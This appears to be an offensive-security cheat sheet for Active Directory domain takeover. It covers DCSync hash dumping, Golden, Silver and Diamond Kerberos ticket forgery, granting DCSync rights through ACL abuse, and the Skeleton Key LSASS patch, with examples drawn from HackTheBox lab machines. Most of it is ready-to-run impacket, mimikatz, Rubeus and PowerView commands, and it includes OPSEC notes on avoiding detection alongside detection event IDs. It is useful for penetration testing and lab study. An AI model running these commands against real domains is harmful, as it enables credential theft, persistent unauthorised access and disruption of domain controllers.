DCSync and Golden Ticket
#Overview
DCSync is a technique that impersonates a Domain Controller to request password data replication from a legitimate DC via the MS-DRSR protocol. It requires the Replication-Get-Changes-All (DS-Replication-Get-Changes-All) extended right, which is granted to Domain Admins, Enterprise Admins, and Domain Controllers by default. Golden, Silver, and Diamond tickets are Kerberos ticket forgery techniques that use compromised long-term keys (krbtgt hash for Golden, service account hash for Silver) to create arbitrary Kerberos tickets without interacting with the KDC. These represent the ultimate domain compromise techniques.
#Prerequisites
DCSync:
- A user account with
Replication-Get-Changes-Allextended right (Domain Admins, or a misconfigured account via ACL abuse) - Network access to the DC's DRSUAPI interface
Golden Ticket:
- The krbtgt account's NTLM hash (obtained through DCSync or NTDS.dit extraction)
- The domain SID (obtainable via
lookupsid,whoami /user, orGet-DomainSID) - Domain FQDN
Silver Ticket:
- A service account's NTLM hash
- The service's SPN
- Domain SID
#Detection & Enumeration
#Check DCSync Rights
# BloodHound: "Find Principals with DCSync Rights" query
# Shows all users/groups that can perform DCSync
# Edge: GetChangesAll / GetChanges on the domain object
# PowerView (Windows)
Get-ObjectAcl -DistinguishedName "dc=<domain>,dc=<tld>" -ResolveGUIDs | \
Where-Object { ($_.ObjectType -eq 'DS-Replication-Get-Changes-All' -or \
$_.ObjectType -eq 'DS-Replication-Get-Changes') -and \
$_.ActiveDirectoryRights -like '*ExtendedRight*' } | Select-Object SecurityIdentifier
# LDAP search
ldapsearch -x -H ldap://<DC> -D '<user>' -w '<pass>' \
-b "dc=<domain>,dc=<tld>" "(objectClass=*)" nTSecurityDescriptor
BASH
#Domain SID Discovery
# lookupsid via SMB
lookupsid.py guest@10.10.10.10 -no-pass | head -20
# Output: Domain SID is: S-1-5-21-XXXX-XXXX-XXXX
# From Windows
whoami /user
# The domain SID is the SID minus the last RID segment
# PowerShell
Get-ADDomain | Select-Object DomainSID
(Get-ADUser <username>).SID.AccountDomainSID
# From Linux with credentials
impacket-lookupsid <domain>/<user>:<pass>@<DC> | grep "Domain SID"
BASH
#Exploitation / Execution
#DCSync with secretsdump.py
# Dump all domain hashes (requires replication rights)
impacket-secretsdump <domain>/<user>@<DC>
# Output: all domain users: uid:rid:lmhash:nthash
# Dump NTLM hashes only
impacket-secretsdump <domain>/<user>@<DC> -just-dc-ntlm
# Dump specific user only
impacket-secretsdump <domain>/<user>@<DC> -just-dc-user Administrator
# Output: Administrator:500:aad3b435b51404eeaad3b435b51404ee:<nthash>:::
# Using NTLM hash instead of password
impacket-secretsdump <domain>/<user>@<DC> -hashes :<nt_hash>
# Using Kerberos authentication (TGT in ccache)
export KRB5CCNAME=<ticket>.ccache
impacket-secretsdump -k -no-pass <domain>/<user>@<DC>
# DCSync with specific ticket for DC machine account
KRB5CCNAME=./DC01\$@http_dc01.rebound.htb@REBOUND.HTB.ccache \
secretsdump.py -k -no-pass dc01.rebound.htb -just-dc-user Administrator
BASH
#Granting DCSync Rights via ACL Abuse
# From Forest HTB (via Account Operators -> Exchange Windows Permissions -> WriteDACL):
# 1. Create controlled user
net user john abc123! /add /domain
# 2. Add to Exchange Windows Permissions (has WriteDACL on domain)
net group "Exchange Windows Permissions" john /add
# 3. Grant DCSync using PowerView
. .\PowerView.ps1
$pass = ConvertTo-SecureString 'abc123!' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('htb\john', $pass)
Add-ObjectACL -PrincipalIdentity john -Credential $cred -Rights DCSync
# 4. Run DCSync with the newly-granted account
impacket-secretsdump htb/john@10.10.10.161
BASH
#Golden Ticket
A Golden Ticket is a forged TGT using the krbtgt hash, granting access to any service as any user.
# impacket-ticketer — forge a Golden Ticket
impacket-ticketer -nthash <krbtgt_nt_hash> -domain-sid <domain_sid> \
-domain <domain> -dc-ip <DC> Administrator
# Produces Administrator.ccache
# With custom user and groups (RID 500=DEFAULT Administrator, 512=Domain Admins)
impacket-ticketer -nthash <krbtgt_nt_hash> -domain-sid <domain_sid> \
-domain <domain> -dc-ip <DC> -user-id 500 -groups 512,513,518,519,520 FakeAdmin
# Export and use the ticket
export KRB5CCNAME=Administrator.ccache
impacket-psexec -k -no-pass <domain>/Administrator@<DC>
impacket-secretsdump -k -no-pass <domain>/Administrator@<DC> -just-dc-ntlm
# mimikatz (Windows)
mimikatz # kerberos::golden /domain:<domain> /sid:<sid> /krbtgt:<hash> /user:Administrator /id:500 /ptt
BASH
#Silver Ticket
A Silver Ticket forges a service ticket for a specific service, using that service account's NTLM hash. Does not touch the KDC.
# impacket-ticketer — forge a Silver Ticket for MSSQL service
# First, get the service account's NT hash
# Then create the ticket
impacket-ticketer -nthash <svc_nt_hash> -domain-sid <domain_sid> \
-domain <domain> -dc-ip <DC> -spn <SPN> Administrator
# Example from Escape HTB (MSSQL service):
echo "1443EC19DA4DAC4FFC953BCA1B57B4CF" # sql_svc NT hash
impacket-ticketer -nthash 1443EC19DA4DAC4FFC953BCA1B57B4CF \
-domain-sid S-1-5-21-4078382237-1492182817-2568127209 \
-domain sequel.htb -dc-ip dc.sequel.htb \
-spn nonexistent/DC.SEQUEL.HTB Administrator
export KRB5CCNAME=Administrator.ccache
impacket-mssqlclient -k dc.sequel.htb
# mimikatz (Windows)
mimikatz # kerberos::golden /domain:<domain> /sid:<sid> /target:<target_server> /service:<service_type> /rc4:<svc_hash> /user:Administrator /ptt
BASH
#Silver Ticket for CIFS/HOST/LDAP
# Silver Ticket — Most commonly used service types
# CIFS (file access):
impacket-ticketer -spn "cifs/target.domain.local" -domain-sid S-1-5-21-... -domain domain.local -nthash NTLM_HASH -user-id 500 administrator
# HOST (service creation/scheduled tasks):
impacket-ticketer -spn "host/target.domain.local" -domain-sid S-1-5-21-... -domain domain.local -nthash NTLM_HASH -user-id 500 administrator
# LDAP (AD queries):
impacket-ticketer -spn "ldap/dc.domain.local" -domain-sid S-1-5-21-... -domain domain.local -nthash NTLM_HASH -user-id 500 administrator
# Use with: KRB5CCNAME=administrator.ccache impacket-psexec domain.local/administrator@target -k -no-pass
BASH
#Diamond Ticket
A Diamond Ticket is a modified legitimate TGT where the PAC is altered to add privileged group memberships, rather than forging the entire ticket.
# 1. Request a legitimate TGT for a low-privileged user
getTGT.py -dc-ip <DC> <domain>/<low_priv_user>:<pass>
# 2. Use Rubeus (Windows) to modify the PAC
Rubeus.exe diamond /ticket:<base64_ticket> /ticketuser:Administrator \
/ticketuserid:500 /groups:512 /krbkey:<krbtgt_aes256_key> /nowrap
# This adds Domain Admins (RID 512) to the ticket's PAC
BASH
#Diamond Ticket / Forged PAC (Alternative)
# Diamond Ticket — Forged TGT with custom PAC (more flexible than Golden Ticket)
# Using Rubeus:
Rubeus.exe diamond /krbkey:KRBTGT_KEY /user:administrator /password:Password1 /domain:domain.local /enctype:aes256 /ticketuser:administrator /ticketuserid:500 /groups:512 /dc:dc.domain.local /createnetonly:C:\temp\program.exe
# Using impacket (TGT with modified PAC):
impacket-ticketer -domain domain.local -domain-sid S-1-5-21-... -nthash KRBTGT_HASH -user-id 500 -groups 512,513 administrator
BASH
#Skeleton Key
The Skeleton Key is a destructive technique that patches LSASS on the Domain Controller to accept a master password for any account.
# mimikatz — DO NOT USE on production/live engagements
mimikatz # privilege::debug
mimikatz # misc::skeleton
# Now any user can authenticate with password "mimikatz"
# Example: net use \\DC\C$ /user:Administrator mimikatz
# WARNING: This patches LSASS in memory on EVERY DC you run it on.
# Restart required to clear. Will break things. High forensic footprint.
BASH
#Detection and OPSEC Differences
| Technique | Kerberos KDC Interaction | Event ID | Detection Difficulty | Persistence |
|---|---|---|---|---|
| DCSync | No (uses DRSUAPI, not Kerberos) | 4662 (directory service access) | Medium — unusual replication requests | One-time credential dump |
| Golden Ticket | No KDC contact after creation | None after creation; 4768 for usage | Low — appears as legitimate TGT | Long-term (krbtgt hash lifetime) |
| Silver Ticket | No KDC contact | None after creation | Low — appears as legitimate TGS | Service-specific (hash lifetime) |
| Diamond Ticket | KDC contact for initial TGT | 4768 for TGT request, then modified | Medium — normal TGT with modified PAC | Short-term (TGT lifetime ~10h) |
| Skeleton Key | Normal authentication | Normal 4624/4768 | High — LSASS patching artifacts | Reboot clears; forensic trail |
#Common Pitfalls
- DCSync without replication rights: Returns
rpc_s_access_denied. Verify the account has the extended rights or grant them first. - Golden Ticket with wrong krbtgt hash: Ticket creation succeeds but authentication fails silently. Double-check the hash source.
- PAC validation: Modern DCs with March 2020+ updates validate PAC signatures. A Diamond ticket approach (modifying legitimate TGT PAC) may be needed.
- Clock skew: Kerberos tickets have strict time validity. Synchronize with
sudo ntpdate -u <DC>. - krbtgt hash rotation: Changing the krbtgt password twice invalidates all existing tickets. A Golden Ticket created with the old hash will stop working.
#OPSEC Considerations
- DCSync is detected: Modern EDR and SIEM solutions flag DCSync attempts. The DRSUAPI replication generates Event ID 4662.
- Event ID 4662 (Object Access) DCSync signature: Properties: {Replicating Directory Changes} and/or {Replicating Directory Changes All}, Object Type: domainDNS. This is the PRIMARY detection signature for DCSync in enterprise SIEM. Also: Event ID 4662 with GUID 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 (DS-Replication-Get-Changes).
- Golden/Silver Tickets bypass MFA: Since tickets are forged offline, they never engage MFA mechanisms.
- Golden Ticket TGT lifetime: Default TGT lifetime is 10 hours. The ticket works until it expires.
- krbtgt NTLM hash: This is the ultimate domain key. Protect it — if the hash is compromised, every account in the domain is compromised.
- No password change events: Using tickets does not change user passwords, avoiding password-reset detection.
- Silver Ticket limitation: Only works for the specific service whose hash you possess.
#Post-Exploitation Value
- Complete domain credential compromise via DCSync
- Persistent access via Golden Ticket (valid as long as krbtgt hash does not change)
- Targeted service access via Silver Ticket
- The krbtgt hash and domain SID are sufficient to forge tickets for any user to any service
#Cross-References
#Tool References
| Tool | Link |
|---|---|
| secretsdump (Impacket) | https://github.com/fortra/impacket |
| ticketer (Impacket) | https://github.com/fortra/impacket |
| Rubeus | https://github.com/GhostPack/Rubeus |
| mimikatz | https://github.com/gentilkiwi/mimikatz |
| PowerView | https://github.com/PowerShellMafia/PowerSploit |
#Source Machines
- Sauna (Easy) — svc_loanmgr had DCSync rights -> secretsdump -just-dc-user Administrator -> pass-the-hash with psexec
- Forest (Easy) — Account Operators -> Exchange Windows Permissions -> Add-ObjectACL DCSync -> secretsdump -> Administrator hash
- Flight (Hard) — Machine account TGT via Rubeus tgtdeleg -> DCSync via secretsdump with -k -no-pass
- Rebound (Insane) — RBCD -> DC01$ impersonation -> DCSync -> Administrator hash
- Authority (Medium) — ESC1 certificate -> PassTheCert RBCD -> getST -> DCSync -> Administrator hash